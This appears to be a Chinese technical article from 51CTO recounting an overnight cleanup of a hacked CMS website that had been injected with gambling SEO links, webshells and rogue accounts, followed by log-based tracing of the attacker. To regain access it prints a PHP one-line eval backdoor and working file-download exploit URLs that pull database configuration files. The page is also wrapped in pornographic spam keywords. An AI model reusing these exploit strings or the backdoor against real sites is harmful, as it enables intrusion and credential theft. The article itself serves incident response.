成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

太刺激!服務器被黑遭攻擊,凌晨一點緊急逆襲!

原創
安全 黑客攻防
回顧整個處理過程,看似簡單,卻非常耗費時間,通過跟圈內朋友交流,我們跟黑客攻擊目標網站進行 SEO 黑鏈處理,就是一場戰爭。服務器上會有各種木馬和 webshell,第一次以為自己清理完畢,結果還遺留有加密的 webshell 以及上傳類型的后門,這種后門的清理非常的耗費時間,尤其是在 Windows 下。

【51CTO.com原創稿件】“凌晨 1 點,接到朋友的求助,網站被黑了,訪問網站首頁會自動定向到一個賭bo網站,這個時間點都是該進入夢鄉的時間,直接開干。

本文分為以下五個部分介紹:

  • 入侵情況分析
  • 服務器第一次安全處理
  • 服務器第二次安全處理
  • 日志分析和追蹤
  • 總結及分析

入侵情況分析

查看首頁代碼

通過查看首頁(index.html/index.php)源代碼發現網站存在 3 處編碼后的代碼,如圖 1 所示,分別在 title、meta 屬性中加入了代碼,對代碼文件中的其他代碼進行查看,未發現有異常。

圖 1:首頁中的可疑代碼

Unicode 編碼轉換

從首頁中插入的代碼來看是 Unicode 編碼,將其復制到 Unicode 編碼在線解碼的網站(http://tool.chinaz.com/tools/unicode.aspx),并選擇 Unicode 轉 ASCII。

如圖 2 所示,解碼后的內容為菠菜宣傳語,換句話說就是黑鏈宣傳,網站被插入黑鏈了。

圖 2:分析網站被插入鏈接

服務器現狀

公司網站發現情況后,由于服務器前期運維人員已經離職,網站是托管在獨立服務器,目前僅僅只有管理員帳號,所以無法直接進入服務器。

在該情況下,迅速開展以下工作:

  • 通過已知管理員帳號登錄前臺和后臺進行查看。登錄前臺可以使用,后臺無法使用,懷疑文件被修改或者刪除,無法通過后臺來查看如何被入侵的。
  • 對目標網站進行漏洞掃描。
  • 查看同 IP 其他網站。通過查看該 IP 地址同服務器其他網站,發現服務器上存在 4 個其他站點,后經詢問 4 個站點均不是公司架設的。懷疑黑客在服務器上架設站點用來進行 SEO 黑鏈服務。

網站漏洞分析

確認網站系統情況

手工通過 robots.txt 文件確認網站采用某網站 CMS v7 版本,這個系統很多漏洞,一看心里就涼了。

發現列目錄漏洞

通過手工和掃描判斷服務器配置上沒有禁止目錄瀏覽,導致服務器所有目錄均可以被訪問。

如圖 3 所示,通過 upload_files 可以看到很多 447 字節的 PHP 文件,第一感覺就是掛馬、黑鏈創建文件或者是后門文件。

后面通過分析一句話后門的大小,一句話后門 <?php@eval($_POST['cmd']);?> 文件的大小為 30 字節,跟 447 字節相差太遠,直接排除一句話后門,當然有可能是加密的一句話后門。

圖 3:列目錄漏洞

發現本地文件下載漏洞

通過了解此網站 CMS V7 版本存在的漏洞發現存在一個文件下載漏洞,其漏洞利用為:http://www.*******.org.cn/do/job.php?job=download&url=base64 編碼文件地址,base64 編碼文件地址。

例如 data/config.php 需要將最后一個 p 更換為“<”,例如分別要讀取 data/config.php、data/uc_config.php、data/mysql_config.php 文件。

其對應 url 中的未編碼地址應為:data/config.ph<、data/uc_config.ph<、data/mysql_config.ph<,利用如下:

  • http://www.****.org.cn/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8
  • http://www.****.org.cn/do/job.php?job=download&url=ZGF0YS91Y19jb25maWcucGg8
  • http://www.****.org.cn/do/job.php?job=download&url=ZGF0YS9teXNxbF9jb25maWcucGg8

在瀏覽器中訪問即可下載這些文件,在本地打開即可查看代碼,如圖 4 所示,讀取到數據庫配置是 root 賬號。

圖 4:獲取網站敏感文件內容

通過同樣的方法讀取 upload_files/kongzhipin.php 文件,其內容如圖 5 所示,典型的 SEO 手法。

圖 5:網站 SEO 黑鏈代碼源文件

獲取本地物理地址

通過訪問 cache/hack 目錄下的 search.php 文件,成功獲取網站的真實物理路徑。

如圖 6 所示,目前有 mysql root 賬號和密碼,有真實路徑,離獲取 webshell 已經很近了。

圖 6:獲取真實物理路徑

文件上傳及 IIS 解析漏洞

如圖 7 所示,可以通過 ckfinder.html 在其上傳目錄中創建 1.asp 和 1.php 目錄,如果服務器存在解析漏洞可以直接獲取 webshell。

圖 7:文件解析及上傳漏洞

數據庫導入漏洞

如圖 8 所示,通過文件目錄漏洞發現在數據庫備份目錄存有數據庫備份文件,前期通過文件下載漏洞獲取了數據庫用戶名和密碼,在這里輸入后,可以使用舊數據覆蓋新數據。

在實際測試時一定要小心,一旦使用該漏洞進行測試,對數據庫將是毀滅性的,數據庫導入一般都是先 drop,后插入。

因此執行此操作后,能成功恢復數據的可能性非常低,建議網站管理人員定期備份數據庫以及代碼文件!

圖 8:數據庫導入漏洞

服務器第一次安全處理

備份當前網站代碼及數據庫

最重要的事情就是備份,備份數據庫及其代碼文件到本地,注意是備份當前的數據庫和源代碼。

如果是要報案,則最好使用備份服務器恢復網站和數據,被入侵服務器留好數據,便于打擊和取證,備份源代碼和數據庫可以用在后面進行分析,對黑客進行追蹤和定位。

使用 WebShellKill 查找后門文件

查殺后門

個人覺得 WebShellKill 這個工具不錯,可以自動檢測很多已知的后門文件和一些病毒文件,它的最新版本是 2.0.9。

下載地址:http://www.d99net.net/down/WebShellKill_V2.0.9.zip

下載后選擇需要掃描的目錄即可開始查殺,如圖 9 所示,在該站點下找到幾百個黑鏈及后門文件,不看不知道,一看嚇一跳,入侵者真狠!對這些可疑文件進行查看和刪除。

圖 9:查殺后門文件

網站大馬

如圖 10 所示,在服務器上發現多個 webshell 大馬,該 webshell 可以對文件、數據庫等進行操作,功能強大。

圖 10:網站大馬

沒有最黑,只有更黑

通過對網站進行大小查看,一個普通的網站竟然超過 20G,明顯不正常,如圖 11 所示,在 data_cache 中,黑客用來做 SEO 竟然高達 21.8552 萬個頁面,共計 15.3G。

圖 11:黑客使用緩存文件高達 15G 大小

刪除服務器添加賬號及后門文件

通過計算機管理-“本地用戶和組”-“用戶”,查看計算機上所有的用戶

經過朋友的確認,紅色框住用戶全部為黑客添加賬號,如圖 12 所示,共計 7 個賬號,將其刪除。

圖 12:黑客添加賬號

查看管理員組和對應用戶所屬文件夾

如圖 13 所示,通過命令查看管理員及用戶賬號,并查看當前用戶的配置文件,在其配置文件中包含一些黑客攻擊工具,將這些文件全部打包壓縮,然后刪除用戶及其配置文件。

圖 13:查看管理員賬號及其黑客賬號配置文件

清理服務器后門文件

對于服務器后門文件清理就要靠個人經驗和技術,一方面可以借助安裝 360 等殺毒軟件來進行自動查殺,如圖 14 所示,系統盤下一堆病毒。

通過殺毒軟件的查殺可以清理第一批,對于被入侵過的服務器,建議是重做系統!

圖 14:使用殺毒軟件對病毒進行查殺處理

實在沒有辦法只能手工對病毒進行清理。后續可以借助 autoruns 和 processxp 等工具對啟動項、服務、進程等進行查看。

如果發現無簽名,可以采取以下一些辦法:

  • 將可疑文件直接上報殺毒網站進行引擎查殺。可以將樣本直接上報卡巴斯基和 360 等平臺。(https://virusdesk.kaspersky.com/、http://sampleup.sd.360.cn/)
  • 更多上報地址請查看http://www.stormcn.cn/post/782.html。
  • 通過百度等搜索引擎搜索名稱,查看網上有無相關資料。
  • 對可疑程序做好備份后,將其刪除。
  • 頑固病毒需要通過冰刃以及進程管理等工具強行結束進程,然后再刪除。
  • 通過 CurrPorts(http://www.nirsoft.net/utils/cports.zip)查看當前網絡連接程序及其相關情況。
  • 實在不放心就要用抓包程序對服務器進行抓包,查看對外連接。
  • 記得清理 shift 后門和放大鏡等可以利用遠程桌面啟動的后門,建議將 shift、放大鏡等程序直接清理或者禁用。

更改所有賬號及密碼

至此第一段落網站入侵清理完畢,對所有網站使用的賬號及密碼進行更改,更改所有密碼,包括遠程桌面,ftp、ssh、后臺管理、數據庫賬號密碼等。

由于黑客入侵過,可能已經下載數據庫和獲取所有相關密碼,因此需要全部進行更改。

恢復網站正常運行

對網站進行恢復,使其正常運行,同時開啟防火墻,對外僅僅開放 80 端口和遠程管理端口。

服務器第二次安全處理

服務器再次出現掛黑鏈現象

過了兩天服務器再次出現問題,發現網站再次出現黑鏈現象,百度搜索該網站域名,出現結果一訪問就指向賭博網站。

手動清理后門文件

再次使用 WebShellKill 工具對站點進行查看

手工對網站所有 PHP 文件進行查看

對網站所有的 PHP 文件進行搜索,安裝文件大小進行排序,對超過 20K 以上文件都需要進行查看。

如圖 15 所示,定位到大文件目錄,一看該文件多半是 webshell,如圖 16 所示,打開以后果然是 webshell,采取了加密,所以 WebShellKill 無法查殺,將該文件的 hash 值直接上報給 WebShellKill 工具。

圖 15:定位大文件位置

圖 16:查看文件內容

手工查殺狡猾的后門

對網站的文件逐個進行查看,文件中有加密字符、亂碼的,多半是 webshell。

如圖 17 所示,另外還發現存在文件上傳頁面,這種通過工具很難查殺出來。

圖 17:另外加密的 webshell

通過分析日志文件定位后門文件

對日志文件中的 php 文件進行搜索,逐個進行驗證,這個可以通過逆火日志分析軟件來實現,后續有介紹。

尋找首頁黑鏈源代碼文件

對于網站首頁的黑鏈源代碼文件,通過搜索百度等均未發現有價值的處理意見,后面通過分析,其代碼一定有加載出來。

對每一個 js 文件進行源頭查看,最終獲取一個編輯器加載的 node.js 文件,其內容如圖 18 所示,明顯就是這個來實現的,將其刪除!

圖 18:獲取黑鏈源代碼文件

第二段落的處理完畢后,網站恢復正常運行,同時修補了發現的漏洞,以及部分明顯程序漏洞。

日志分析和追蹤

對 IIS 日志進行手工分析

  • 將 IIS 日志文件生成一個文件,可以利用命令來實現:cat *.log>alllog.txt。
  • 對源代碼中存在的后門文件進行逐個梳理,整理出文件名稱。
  • 在日志中以文件名為關鍵字進行查看,如圖 19 所示,可以獲取曾經訪問過該文件的 IP 地址,這些地址可以用來進行跟蹤和案件打擊。

圖 19:手工追蹤黑客 IP 地址

黑客賬號配置文件分析和追蹤

獲取黑客的 QQ 號碼

通過查看黑客添加的賬號下的配置文件,可以獲取黑客曾經使用過什么工具,訪問過什么站點等信息,如圖 20 所示,黑客曾經在該服務器上登錄過。

圖 20:獲取黑客訪問的 QQ 號碼

獲取黑客攻擊高校源代碼

在黑客當前賬號下,還發現三個高校站點壓縮包,如圖 21 所示。

圖 21:黑客攻擊其他目標

利用逆火對網站日志進行分析處理

分析黑客攻擊 IP 地址

在虛擬機上安裝逆火日志分析軟件(該軟件已經停止更新),如圖 22 所示,安裝完畢后,需要設置網站的 url、首頁文件和日志文件名稱及位置,完畢后即可進行分析。

這里需要注意的是如果需要定位黑客,需要在選項中進行配置,將黑客的后門文件名稱加入到文件追蹤和黑客攻擊中。

圖 22:通過日志分析黑客 IP 地址及其相關行為

對網站進行漏洞分析

如果日志文件足夠多,則可以通過統計分析,在訪問資源、錯誤等內容中去發現存在的漏洞和攻擊行為,這些分析將有助于修補漏洞和發現攻擊行為,對存在問題進行修復。

總結及分析

回顧整個處理過程,看似簡單,卻非常耗費時間,通過跟圈內朋友交流,我們跟黑客攻擊目標網站進行 SEO 黑鏈處理,就是一場戰爭。

服務器上會有各種木馬和 webshell,第一次以為自己清理完畢,結果還遺留有加密的 webshell 以及上傳類型的后門,這種后門的清理非常的耗費時間,尤其是在 Windows 下。

整個過程有以下一些體會跟大家分享:

  • 備份數據庫及代碼文件到本地或者其他服務器。
  • 使用 WebShellKill 自動清理第一遍,對第一遍出現的 shell 后門要進行登記或者抓圖,特別要統計文件時間。
  • 利用文件時間對文件進行搜索,對同時間點的文件要進行特別查看。
  • 對所有相關文件類型進行搜索,對大個頭文件一定要進行手工查看。
  • 可以在 Windows 操作系統下加載類 Linux 系統對文件內容進行掃描,不放過文件包含后門。
  • 對首頁掛馬的 js 文件可以進行核實,找到源頭。
  • 將 IIS 日志文件利用逆火日志分析軟件進行分析處理,尋找漏洞和黑客 IP。
  • 安裝殺毒軟件,開啟防火墻,對服務器進行安全清理和加固,升級系統補丁程序。

[[222397]]

陳小兵,高級工程師,北理工計算機學院博士在讀。擁有豐富的信息系統項目經驗以及 15 年以上網絡安全經驗。現主要從事網絡安全及數據庫技術研究工作。已出版《SQL Server2000培訓教程》《黑客攻防及實戰案例解析》《Web滲透及實戰案例解析》《安全之路-Web滲透及實戰案例解析第二版》、《黑客攻防實戰加密與解密》、《網絡攻防實戰研究:漏洞利用與提權》、《網絡攻防實戰研究:MySQL數據庫攻擊與防范》共計 7 本專著,在國內核心期刊及普通學術期刊發表論文 20 余篇,曾在《黑客防線》、《黑客X檔案》、《網管員世界》、《開放系統及世界》、《視窗世界》等雜志發表文章 100 余篇。

 

【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】

責任編輯:武曉燕 來源: 51CTO
相關推薦

2018-04-04 09:57:25

2009-12-15 17:50:28

2013-05-02 11:48:26

2009-10-09 10:46:17

2011-07-04 10:30:53

2015-12-10 15:26:58

2009-10-28 11:09:59

2009-11-14 09:42:01

2009-10-30 09:30:33

2012-07-13 11:15:48

2014-01-23 09:41:27

2020-11-11 09:22:21

秒殺系統復盤

2013-02-26 10:02:56

2012-05-22 20:14:17

2022-02-27 12:46:17

勒索軟件黑客網絡攻擊

2009-08-22 14:17:28

2011-07-06 14:45:38

2014-01-23 09:54:57

2011-07-28 14:27:51

2016-02-17 09:59:58

網絡攻擊數據泄露服務器安全
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产视频1区 | 亚洲视频二区 | 综合自拍 | 国产高清免费视频 | 在线小视频 | 国产激情视频在线观看 | 国产91在线播放精品91 | 国产男女精品 | 精品久久久一区二区 | 国精产品一品二品国精在线观看 | 婷婷综合五月天 | 伊人超碰 | 日韩亚洲欧美一区 | 亚洲性人人天天夜夜摸 | 欧美日韩高清在线观看 | 精品久久久久久亚洲精品 | 三区在线 | 久久久高清 | 丝袜一区二区三区 | 日本成人综合 | 国产精品久久久久久妇女 | 99久久精品国产一区二区三区 | 欧美日韩一二区 | 国产欧美视频一区二区 | 97色在线视频 | 久久久久久久香蕉 | 91一区二区三区在线观看 | 黄色一级大片在线免费看产 | 欧美一级在线视频 | 免费在线成人 | 欧美精品久久久久 | 人人种亚洲 | 亚洲美女网站 | 国产精品夜夜夜一区二区三区尤 | wwwxx在线观看| 国产精品美女久久久久久久久久久 | 国产一区视频在线 | 蜜桃一区二区三区在线 | 羞羞视频免费在线观看 | 亚洲一区亚洲二区 | 久久精品国产免费 |